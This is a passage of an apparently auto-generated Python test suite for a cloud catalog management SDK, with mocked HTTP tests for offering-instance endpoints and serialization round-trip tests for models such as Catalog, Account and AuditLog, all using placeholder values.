mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Construct a dict representation of a OfferingInstanceLastOperation model
offering_instance_last_operation_model = {}
offering_instance_last_operation_model['operation'] = 'testString'
offering_instance_last_operation_model['state'] = 'testString'
offering_instance_last_operation_model['message'] = 'testString'
offering_instance_last_operation_model['transaction_id'] = 'testString'
offering_instance_last_operation_model['updated'] = 'testString'
# Set up parameter values
instance_identifier = 'testString'
x_auth_refresh_token = 'testString'
id = 'testString'
rev = 'testString'
url = 'testString'
crn = 'testString'
label = 'testString'
catalog_id = 'testString'
offering_id = 'testString'
kind_format = 'testString'
version = 'testString'
cluster_id = 'testString'
cluster_region = 'testString'
cluster_namespaces = ['testString']
cluster_all_namespaces = True
schematics_workspace_id = 'testString'
resource_group_id = 'testString'
install_plan = 'testString'
channel = 'testString'
metadata = {}
last_operation = offering_instance_last_operation_model
# Invoke method
response = _service.put_offering_instance(
instance_identifier,
x_auth_refresh_token,
id=id,
rev=rev,
url=url,
crn=crn,
label=label,
catalog_id=catalog_id,
offering_id=offering_id,
kind_format=kind_format,
version=version,
cluster_id=cluster_id,
cluster_region=cluster_region,
cluster_namespaces=cluster_namespaces,
cluster_all_namespaces=cluster_all_namespaces,
schematics_workspace_id=schematics_workspace_id,
resource_group_id=resource_group_id,
install_plan=install_plan,
channel=channel,
metadata=metadata,
last_operation=last_operation,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['url'] == 'testString'
assert req_body['crn'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['catalog_id'] == 'testString'
assert req_body['offering_id'] == 'testString'
assert req_body['kind_format'] == 'testString'
assert req_body['version'] == 'testString'
assert req_body['cluster_id'] == 'testString'
assert req_body['cluster_region'] == 'testString'
assert req_body['cluster_namespaces'] == ['testString']
assert req_body['cluster_all_namespaces'] == True
assert req_body['schematics_workspace_id'] == 'testString'
assert req_body['resource_group_id'] == 'testString'
assert req_body['install_plan'] == 'testString'
assert req_body['channel'] == 'testString'
assert req_body['metadata'] == {}
assert req_body['last_operation'] == offering_instance_last_operation_model
@responses.activate
def test_put_offering_instance_required_params(self):
"""
test_put_offering_instance_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
instance_identifier = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.put_offering_instance(
instance_identifier,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_put_offering_instance_value_error(self):
"""
test_put_offering_instance_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
mock_response = '{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "catalog_id": "catalog_id", "offering_id": "offering_id", "kind_format": "kind_format", "version": "version", "cluster_id": "cluster_id", "cluster_region": "cluster_region", "cluster_namespaces": ["cluster_namespaces"], "cluster_all_namespaces": true, "schematics_workspace_id": "schematics_workspace_id", "resource_group_id": "resource_group_id", "install_plan": "install_plan", "channel": "channel", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "last_operation": {"operation": "operation", "state": "state", "message": "message", "transaction_id": "transaction_id", "updated": "updated"}}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
instance_identifier = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"instance_identifier": instance_identifier,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.put_offering_instance(**req_copy)
class TestDeleteOfferingInstance():
"""
Test Class for delete_offering_instance
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_offering_instance_all_params(self):
"""
delete_offering_instance()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
instance_identifier = 'testString'
x_auth_refresh_token = 'testString'
# Invoke method
response = _service.delete_offering_instance(
instance_identifier,
x_auth_refresh_token,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_offering_instance_value_error(self):
"""
test_delete_offering_instance_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/instances/offerings/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
instance_identifier = 'testString'
x_auth_refresh_token = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"instance_identifier": instance_identifier,
"x_auth_refresh_token": x_auth_refresh_token,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_offering_instance(**req_copy)
# endregion
##############################################################################
# End of Service: Instances
##############################################################################
##############################################################################
# Start of Model Tests
##############################################################################
# region
class TestModel_AccessListBulkResponse():
"""
Test Class for AccessListBulkResponse
"""
def test_access_list_bulk_response_serialization(self):
"""
Test serialization/deserialization for AccessListBulkResponse
"""
# Construct a json representation of a AccessListBulkResponse model
access_list_bulk_response_model_json = {}
access_list_bulk_response_model_json['errors'] = {}
# Construct a model instance of AccessListBulkResponse by calling from_dict on the json representation
access_list_bulk_response_model = AccessListBulkResponse.from_dict(access_list_bulk_response_model_json)
assert access_list_bulk_response_model != False
# Construct a model instance of AccessListBulkResponse by calling from_dict on the json representation
access_list_bulk_response_model_dict = AccessListBulkResponse.from_dict(access_list_bulk_response_model_json).__dict__
access_list_bulk_response_model2 = AccessListBulkResponse(**access_list_bulk_response_model_dict)
# Verify the model instances are equivalent
assert access_list_bulk_response_model == access_list_bulk_response_model2
# Convert model instance back to dict and verify no loss of data
access_list_bulk_response_model_json2 = access_list_bulk_response_model.to_dict()
assert access_list_bulk_response_model_json2 == access_list_bulk_response_model_json
class TestModel_Account():
"""
Test Class for Account
"""
def test_account_serialization(self):
"""
Test serialization/deserialization for Account
"""
# Construct dict forms of any model objects needed in order to build this model.
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
filters_model = {} # Filters
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
# Construct a json representation of a Account model
account_model_json = {}
account_model_json['id'] = 'testString'
account_model_json['hide_IBM_cloud_catalog'] = True
account_model_json['account_filters'] = filters_model
# Construct a model instance of Account by calling from_dict on the json representation
account_model = Account.from_dict(account_model_json)
assert account_model != False
# Construct a model instance of Account by calling from_dict on the json representation
account_model_dict = Account.from_dict(account_model_json).__dict__
account_model2 = Account(**account_model_dict)
# Verify the model instances are equivalent
assert account_model == account_model2
# Convert model instance back to dict and verify no loss of data
account_model_json2 = account_model.to_dict()
assert account_model_json2 == account_model_json
class TestModel_AccumulatedFilters():
"""
Test Class for AccumulatedFilters
"""
def test_accumulated_filters_serialization(self):
"""
Test serialization/deserialization for AccumulatedFilters
"""
# Construct dict forms of any model objects needed in order to build this model.
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
filters_model = {} # Filters
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
accumulated_filters_catalog_filters_item_catalog_model = {} # AccumulatedFiltersCatalogFiltersItemCatalog
accumulated_filters_catalog_filters_item_catalog_model['id'] = 'testString'
accumulated_filters_catalog_filters_item_catalog_model['name'] = 'testString'
accumulated_filters_catalog_filters_item_model = {} # AccumulatedFiltersCatalogFiltersItem
accumulated_filters_catalog_filters_item_model['catalog'] = accumulated_filters_catalog_filters_item_catalog_model
accumulated_filters_catalog_filters_item_model['filters'] = filters_model
# Construct a json representation of a AccumulatedFilters model
accumulated_filters_model_json = {}
accumulated_filters_model_json['account_filters'] = [filters_model]
accumulated_filters_model_json['catalog_filters'] = [accumulated_filters_catalog_filters_item_model]
# Construct a model instance of AccumulatedFilters by calling from_dict on the json representation
accumulated_filters_model = AccumulatedFilters.from_dict(accumulated_filters_model_json)
assert accumulated_filters_model != False
# Construct a model instance of AccumulatedFilters by calling from_dict on the json representation
accumulated_filters_model_dict = AccumulatedFilters.from_dict(accumulated_filters_model_json).__dict__
accumulated_filters_model2 = AccumulatedFilters(**accumulated_filters_model_dict)
# Verify the model instances are equivalent
assert accumulated_filters_model == accumulated_filters_model2
# Convert model instance back to dict and verify no loss of data
accumulated_filters_model_json2 = accumulated_filters_model.to_dict()
assert accumulated_filters_model_json2 == accumulated_filters_model_json
class TestModel_AccumulatedFiltersCatalogFiltersItem():
"""
Test Class for AccumulatedFiltersCatalogFiltersItem
"""
def test_accumulated_filters_catalog_filters_item_serialization(self):
"""
Test serialization/deserialization for AccumulatedFiltersCatalogFiltersItem
"""
# Construct dict forms of any model objects needed in order to build this model.
accumulated_filters_catalog_filters_item_catalog_model = {} # AccumulatedFiltersCatalogFiltersItemCatalog
accumulated_filters_catalog_filters_item_catalog_model['id'] = 'testString'
accumulated_filters_catalog_filters_item_catalog_model['name'] = 'testString'
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
filters_model = {} # Filters
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
# Construct a json representation of a AccumulatedFiltersCatalogFiltersItem model
accumulated_filters_catalog_filters_item_model_json = {}
accumulated_filters_catalog_filters_item_model_json['catalog'] = accumulated_filters_catalog_filters_item_catalog_model
accumulated_filters_catalog_filters_item_model_json['filters'] = filters_model
# Construct a model instance of AccumulatedFiltersCatalogFiltersItem by calling from_dict on the json representation
accumulated_filters_catalog_filters_item_model = AccumulatedFiltersCatalogFiltersItem.from_dict(accumulated_filters_catalog_filters_item_model_json)
assert accumulated_filters_catalog_filters_item_model != False
# Construct a model instance of AccumulatedFiltersCatalogFiltersItem by calling from_dict on the json representation
accumulated_filters_catalog_filters_item_model_dict = AccumulatedFiltersCatalogFiltersItem.from_dict(accumulated_filters_catalog_filters_item_model_json).__dict__
accumulated_filters_catalog_filters_item_model2 = AccumulatedFiltersCatalogFiltersItem(**accumulated_filters_catalog_filters_item_model_dict)
# Verify the model instances are equivalent
assert accumulated_filters_catalog_filters_item_model == accumulated_filters_catalog_filters_item_model2
# Convert model instance back to dict and verify no loss of data
accumulated_filters_catalog_filters_item_model_json2 = accumulated_filters_catalog_filters_item_model.to_dict()
assert accumulated_filters_catalog_filters_item_model_json2 == accumulated_filters_catalog_filters_item_model_json
class TestModel_AccumulatedFiltersCatalogFiltersItemCatalog():
"""
Test Class for AccumulatedFiltersCatalogFiltersItemCatalog
"""
def test_accumulated_filters_catalog_filters_item_catalog_serialization(self):
"""
Test serialization/deserialization for AccumulatedFiltersCatalogFiltersItemCatalog
"""
# Construct a json representation of a AccumulatedFiltersCatalogFiltersItemCatalog model
accumulated_filters_catalog_filters_item_catalog_model_json = {}
accumulated_filters_catalog_filters_item_catalog_model_json['id'] = 'testString'
accumulated_filters_catalog_filters_item_catalog_model_json['name'] = 'testString'
# Construct a model instance of AccumulatedFiltersCatalogFiltersItemCatalog by calling from_dict on the json representation
accumulated_filters_catalog_filters_item_catalog_model = AccumulatedFiltersCatalogFiltersItemCatalog.from_dict(accumulated_filters_catalog_filters_item_catalog_model_json)
assert accumulated_filters_catalog_filters_item_catalog_model != False
# Construct a model instance of AccumulatedFiltersCatalogFiltersItemCatalog by calling from_dict on the json representation
accumulated_filters_catalog_filters_item_catalog_model_dict = AccumulatedFiltersCatalogFiltersItemCatalog.from_dict(accumulated_filters_catalog_filters_item_catalog_model_json).__dict__
accumulated_filters_catalog_filters_item_catalog_model2 = AccumulatedFiltersCatalogFiltersItemCatalog(**accumulated_filters_catalog_filters_item_catalog_model_dict)
# Verify the model instances are equivalent
assert accumulated_filters_catalog_filters_item_catalog_model == accumulated_filters_catalog_filters_item_catalog_model2
# Convert model instance back to dict and verify no loss of data
accumulated_filters_catalog_filters_item_catalog_model_json2 = accumulated_filters_catalog_filters_item_catalog_model.to_dict()
assert accumulated_filters_catalog_filters_item_catalog_model_json2 == accumulated_filters_catalog_filters_item_catalog_model_json
class TestModel_ApprovalResult():
"""
Test Class for ApprovalResult
"""
def test_approval_result_serialization(self):
"""
Test serialization/deserialization for ApprovalResult
"""
# Construct a json representation of a ApprovalResult model
approval_result_model_json = {}
approval_result_model_json['allow_request'] = True
approval_result_model_json['ibm'] = True
approval_result_model_json['public'] = True
approval_result_model_json['changed'] = True
# Construct a model instance of ApprovalResult by calling from_dict on the json representation
approval_result_model = ApprovalResult.from_dict(approval_result_model_json)
assert approval_result_model != False
# Construct a model instance of ApprovalResult by calling from_dict on the json representation
approval_result_model_dict = ApprovalResult.from_dict(approval_result_model_json).__dict__
approval_result_model2 = ApprovalResult(**approval_result_model_dict)
# Verify the model instances are equivalent
assert approval_result_model == approval_result_model2
# Convert model instance back to dict and verify no loss of data
approval_result_model_json2 = approval_result_model.to_dict()
assert approval_result_model_json2 == approval_result_model_json
class TestModel_AuditLog():
"""
Test Class for AuditLog
"""
def test_audit_log_serialization(self):
"""
Test serialization/deserialization for AuditLog
"""
# Construct dict forms of any model objects needed in order to build this model.
audit_record_model = {} # AuditRecord
audit_record_model['id'] = 'testString'
audit_record_model['created'] = "2019-01-01T12:00:00Z"
audit_record_model['change_type'] = 'testString'
audit_record_model['target_type'] = 'testString'
audit_record_model['target_id'] = 'testString'
audit_record_model['who_delegate_email'] = 'testString'
audit_record_model['message'] = 'testString'
# Construct a json representation of a AuditLog model
audit_log_model_json = {}
audit_log_model_json['list'] = [audit_record_model]
# Construct a model instance of AuditLog by calling from_dict on the json representation
audit_log_model = AuditLog.from_dict(audit_log_model_json)
assert audit_log_model != False
# Construct a model instance of AuditLog by calling from_dict on the json representation
audit_log_model_dict = AuditLog.from_dict(audit_log_model_json).__dict__
audit_log_model2 = AuditLog(**audit_log_model_dict)
# Verify the model instances are equivalent
assert audit_log_model == audit_log_model2
# Convert model instance back to dict and verify no loss of data
audit_log_model_json2 = audit_log_model.to_dict()
assert audit_log_model_json2 == audit_log_model_json
class TestModel_AuditRecord():
"""
Test Class for AuditRecord
"""
def test_audit_record_serialization(self):
"""
Test serialization/deserialization for AuditRecord
"""
# Construct a json representation of a AuditRecord model
audit_record_model_json = {}
audit_record_model_json['id'] = 'testString'
audit_record_model_json['created'] = "2019-01-01T12:00:00Z"
audit_record_model_json['change_type'] = 'testString'
audit_record_model_json['target_type'] = 'testString'
audit_record_model_json['target_id'] = 'testString'
audit_record_model_json['who_delegate_email'] = 'testString'
audit_record_model_json['message'] = 'testString'
# Construct a model instance of AuditRecord by calling from_dict on the json representation
audit_record_model = AuditRecord.from_dict(audit_record_model_json)
assert audit_record_model != False
# Construct a model instance of AuditRecord by calling from_dict on the json representation
audit_record_model_dict = AuditRecord.from_dict(audit_record_model_json).__dict__
audit_record_model2 = AuditRecord(**audit_record_model_dict)
# Verify the model instances are equivalent
assert audit_record_model == audit_record_model2
# Convert model instance back to dict and verify no loss of data
audit_record_model_json2 = audit_record_model.to_dict()
assert audit_record_model_json2 == audit_record_model_json
class TestModel_Catalog():
"""
Test Class for Catalog
"""
def test_catalog_serialization(self):
"""
Test serialization/deserialization for Catalog
"""
# Construct dict forms of any model objects needed in order to build this model.
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
filters_model = {} # Filters
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
syndication_cluster_model = {} # SyndicationCluster
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
syndication_history_model = {} # SyndicationHistory
syndication_history_model['namespaces'] = ['testString']
syndication_history_model['clusters'] = [syndication_cluster_model]
syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"
syndication_authorization_model = {} # SyndicationAuthorization
syndication_authorization_model['token'] = 'testString'
syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"
syndication_resource_model = {} # SyndicationResource
syndication_resource_model['remove_related_components'] = True
syndication_resource_model['clusters'] = [syndication_cluster_model]
syndication_resource_model['history'] = syndication_history_model
syndication_resource_model['authorization'] = syndication_authorization_model
# Construct a json representation of a Catalog model
catalog_model_json = {}
catalog_model_json['id'] = 'testString'
catalog_model_json['_rev'] = 'testString'
catalog_model_json['label'] = 'testString'
catalog_model_json['short_description'] = 'testString'
catalog_model_json['catalog_icon_url'] = 'testString'
catalog_model_json['tags'] = ['testString']
catalog_model_json['url'] = 'testString'
catalog_model_json['crn'] = 'testString'
catalog_model_json['offerings_url'] = 'testString'
catalog_model_json['features'] = [feature_model]
catalog_model_json['disabled'] = True
catalog_model_json['created'] = "2019-01-01T12:00:00Z"
catalog_model_json['updated'] = "2019-01-01T12:00:00Z"
catalog_model_json['resource_group_id'] = 'testString'
catalog_model_json['owning_account'] = 'testString'
catalog_model_json['catalog_filters'] = filters_model
catalog_model_json['syndication_settings'] = syndication_resource_model
catalog_model_json['kind'] = 'testString'
# Construct a model instance of Catalog by calling from_dict on the json representation
catalog_model = Catalog.from_dict(catalog_model_json)
assert catalog_model != False
# Construct a model instance of Catalog by calling from_dict on the json representation
catalog_model_dict = Catalog.from_dict(catalog_model_json).__dict__
catalog_model2 = Catalog(**catalog_model_dict)
# Verify the model instances are equivalent
assert catalog_model == catalog_model2
# Convert model instance back to dict and verify no loss of data
catalog_model_json2 = catalog_model.to_dict()
assert catalog_model_json2 == catalog_model_json
class TestModel_CatalogObject():
"""
Test Class for CatalogObject
"""
def test_catalog_object_serialization(self):
"""
Test serialization/deserialization for CatalogObject
"""
# Construct dict forms of any model objects needed in order to build this model.
publish_object_model = {} # PublishObject
publish_object_model['permit_ibm_public_publish'] = True
publish_object_model['ibm_approved'] = True
publish_object_model['public_approved'] = True
publish_object_model['portal_approval_record'] = 'testString'
publish_object_model['portal_url'] = 'testString'
state_model = {} # State
state_model['current'] = 'testString'
state_model['current_entered'] = "2019-01-01T12:00:00Z"
state_model['pending'] = 'testString'
state_model['pending_requested'] = "2019-01-01T12:00:00Z"
state_model['previous'] = 'testString'
# Construct a json representation of a CatalogObject model
catalog_object_model_json = {}
catalog_object_model_json['id'] = 'testString'
catalog_object_model_json['name'] = 'testString'
catalog_object_model_json['_rev'] = 'testString'
catalog_object_model_json['crn'] = 'testString'
catalog_object_model_json['url'] = 'testString'
catalog_object_model_json['parent_id'] = 'testString'
catalog_object_model_json['label_i18n'] = 'testString'
catalog_object_model_json['label'] = 'testString'
catalog_object_model_json['tags'] = ['testString']
catalog_object_model_json['created'] = "2019-01-01T12:00:00Z"
catalog_object_model_json['updated'] = "2019-01-01T12:00:00Z"
catalog_object_model_json['short_description'] = 'testString'
catalog_object_model_json['short_description_i18n'] = 'testString'
catalog_object_model_json['kind'] = 'testString'
catalog_object_model_json['publish'] = publish_object_model
catalog_object_model_json['state'] = state_model
catalog_object_model_json['catalog_id'] = 'testString'
catalog_object_model_json['catalog_name'] = 'testString'
catalog_object_model_json['data'] = {}
# Construct a model instance of CatalogObject by calling from_dict on the json representation
catalog_object_model = CatalogObject.from_dict(catalog_object_model_json)
assert catalog_object_model != False
# Construct a model instance of CatalogObject by calling from_dict on the json representation
catalog_object_model_dict = CatalogObject.from_dict(catalog_object_model_json).__dict__
catalog_object_model2 = CatalogObject(**catalog_object_model_dict)
# Verify the model instances are equivalent
assert catalog_object_model == catalog_object_model2
# Convert model instance back to dict and verify no loss of data
catalog_object_model_json2 = catalog_object_model.to_dict()
assert catalog_object_model_json2 == catalog_object_model_json
class TestModel_CatalogSearchResult():
"""
Test Class for CatalogSearchResult
"""
def test_catalog_search_result_serialization(self):
"""
Test serialization/deserialization for CatalogSearchResult
"""
# Construct dict forms of any model objects needed in order to build this model.
feature_model = {} # Feature
feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
category_filter_model = {} # CategoryFilter
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
id_filter_model = {} # IDFilter
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
filters_model = {} # Filters
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
syndication_cluster_model = {} # SyndicationCluster
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
syndication_history_model = {} # SyndicationHistory
syndication_history_model['namespaces'] = ['testString']
syndication_history_model['clusters'] = [syndication_cluster_model]
syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"
syndication_authorization_model = {} # SyndicationAuthorization
syndication_authorization_model['token'] = 'testString'
syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"
syndication_resource_model = {} # SyndicationResource
syndication_resource_model['remove_related_components'] = True
syndication_resource_model['clusters'] = [syndication_cluster_model]
syndication_resource_model['history'] = syndication_history_model
syndication_resource_model['authorization'] = syndication_authorization_model
catalog_model = {} # Catalog
catalog_model['id'] = 'testString'
catalog_model['_rev'] = 'testString'
catalog_model['label'] = 'testString'
catalog_model['short_description'] = 'testString'
catalog_model['catalog_icon_url'] = 'testString'
catalog_model['tags'] = ['testString']
catalog_model['url'] = 'testString'
catalog_model['crn'] = 'testString'
catalog_model['offerings_url'] = 'testString'
catalog_model['features'] = [feature_model]
catalog_model['disabled'] = True
catalog_model['created'] = "2019-01-01T12:00:00Z"
catalog_model['updated'] = "2019-01-01T12:00:00Z"
catalog_model['resource_group_id'] = 'testString'
catalog_model['owning_account'] = 'testString'
catalog_model['catalog_filters'] = filters_model
catalog_model['syndication_settings'] = syndication_resource_model
catalog_model['kind'] = 'testString'
# Construct a json representation of a CatalogSearchResult model
catalog_search_result_model_json = {}
catalog_search_result_model_json['total_count'] = 38
catalog_search_result_model_json['resources'] = [catalog_model]
# Construct a model instance of CatalogSearchResult by calling from_dict on the json representation
catalog_search_result_model = CatalogSearchResult.from_dict(catalog_search_result_model_json)
assert catalog_search_result_model != False
# Construct a model instance of CatalogSearchResult by calling from_dict on the json representation
catalog_search_result_model_dict = CatalogSearchResult.from_dict(catalog_search_result_model_json).__dict__
catalog_search_result_model2 = CatalogSearchResult(**catalog_search_result_model_dict)
# Verify the model instances are equivalent
assert catalog_search_result_model == catalog_search_result_model2
# Convert model instance back to dict and verify no loss of data
catalog_search_result_model_json2 = catalog_search_result_model.to_dict()
assert catalog_search_result_model_json2 == catalog_search_result_model_json
class TestModel_CategoryFilter():
"""
Test Class for CategoryFilter
"""
def test_category_filter_serialization(self):
"""
Test serialization/deserialization for CategoryFilter
"""
# Construct dict forms of any model objects needed in order to build this model.
filter_terms_model = {} # FilterTerms
filter_terms_model['filter_terms'] = ['testString']
# Construct a json representation of a CategoryFilter model
category_filter_model_json = {}
category_filter_model_json['include'] = True
category_filter_model_json['filter'] = filter_terms_model
# Construct a model instance of CategoryFilter by calling from_dict on the json representation
category_filter_model = CategoryFilter.from_dict(category_filter_model_json)
assert category_filter_model != False
# Construct a model instance of CategoryFilter by calling from_dict on the json representation
category_filter_model_dict = CategoryFilter.from_dict(category_filter_model_json).__dict__
category_filter_model2 = CategoryFilter(**category_filter_model_dict)
# Verify the model instances are equivalent
assert category_filter_model == category_filter_model2
# Convert model instance back to dict and verify no loss of data
category_filter_model_json2 = category_filter_model.to_dict()
assert category_filter_model_json2 == category_filter_model_json
class TestModel_ClusterInfo():
"""
Test Class for ClusterInfo
"""
def test_cluster_info_serialization(self):
"""
Test serialization/deserialization for ClusterInfo
"""
# Construct a json representation of a ClusterInfo model
cluster_info_model_json = {}
cluster_info_model_json['resource_group_id'] = 'testString'
cluster_info_model_json['resource_group_name'] = 'testString'
cluster_info_model_json['id'] = 'testString'
cluster_info_model_json['name'] = 'testString'
cluster_info_model_json['region'] = 'testString'
# Construct a model instance of ClusterInfo by calling from_dict on the json representation
cluster_info_model = ClusterInfo.from_dict(cluster_info_model_json)
assert cluster_info_model != False
# Construct a model instance of ClusterInfo by calling from_dict on the json representation
cluster_info_model_dict = ClusterInfo.from_dict(cluster_info_model_json).__dict__
cluster_info_model2 = ClusterInfo(**cluster_info_model_dict)
# Verify the model instances are equivalent
assert cluster_info_model == cluster_info_model2
# Convert model instance back to dict and verify no loss of data
cluster_info_model_json2 = cluster_info_model.to_dict()
assert cluster_info_model_json2 == cluster_info_model_json
class TestModel_Configuration():
"""
Test Class for Configuration
"""
def test_configuration_serialization(self):
"""
Test serialization/deserialization for Configuration
"""
# Construct a json representation of a Configuration model
configuration_model_json = {}
configuration_model_json['key'] = 'testString'
configuration_model_json['type'] = 'testString'
configuration_model_json['default_value'] = { 'foo': 'bar' }
configuration_model_json['value_constraint'] = 'testString'
configuration_model_json['description'] = 'testString'
configuration_model_json['required'] = True
configuration_model_json['options'] = [{ 'foo': 'bar' }]
configuration_model_json['hidden'] = True
# Construct a model instance of Configuration by calling from_dict on the json representation
configuration_model = Configuration.from_dict(configuration_model_json)
assert configuration_model != False
# Construct a model instance of Configuration by calling from_dict on the json representation
configuration_model_dict = Configuration.from_dict(configuration_model_json).__dict__
configuration_model2 = Configuration(**configuration_model_dict)
# Verify the model instances are equivalent
assert configuration_model == configuration_model2
# Convert model instance back to dict and verify no loss of data
configuration_model_json2 = configuration_model.to_dict()
assert configuration_model_json2 == configuration_model_json
class TestModel_DeployRequestBodySchematics():
"""
Test Class for DeployRequestBodySchematics
"""
def test_deploy_request_body_schematics_serialization(self):
"""
Test serialization/deserialization for DeployRequestBodySchematics
"""
# Construct a json representation of a DeployRequestBodySchematics model
deploy_request_body_schematics_model_json = {}
deploy_request_body_schematics_model_json['name'] = 'testString'
deploy_request_body_schematics_model_json['description'] = 'testString'
deploy_request_body_schematics_model_json['tags'] = ['testString']
deploy_request_body_schematics_model_json['resource_group_id'] = 'testString'
# Construct a model instance of DeployRequestBodySchematics by calling from_dict on the json representation
deploy_request_body_schematics_model = DeployRequestBodySchematics.from_dict(deploy_request_body_schematics_model_json)
assert deploy_request_body_schematics_model != False
# Construct a model instance of DeployRequestBodySchematics by calling from_dict on the json representation
deploy_request_body_schematics_model_dict = DeployRequestBodySchematics.from_dict(deploy_request_body_schematics_model_json).__dict__
deploy_request_body_schematics_model2 = DeployRequestBodySchematics(**deploy_request_body_schematics_model_dict)
# Verify the model instances are equivalent
assert deploy_request_body_schematics_model == deploy_request_body_schematics_model2
# Convert model instance back to dict and verify no loss of data
deploy_request_body_schematics_model_json2 = deploy_request_body_schematics_model.to_dict()
assert deploy_request_body_schematics_model_json2 == deploy_request_body_schematics_model_json
class TestModel_Deployment():
"""
Test Class for Deployment
"""
def test_deployment_serialization(self):
"""
Test serialization/deserialization for Deployment
"""
# Construct a json representation of a Deployment model
deployment_model_json = {}
deployment_model_json['id'] = 'testString'
deployment_model_json['label'] = 'testString'
deployment_model_json['name'] = 'testString'
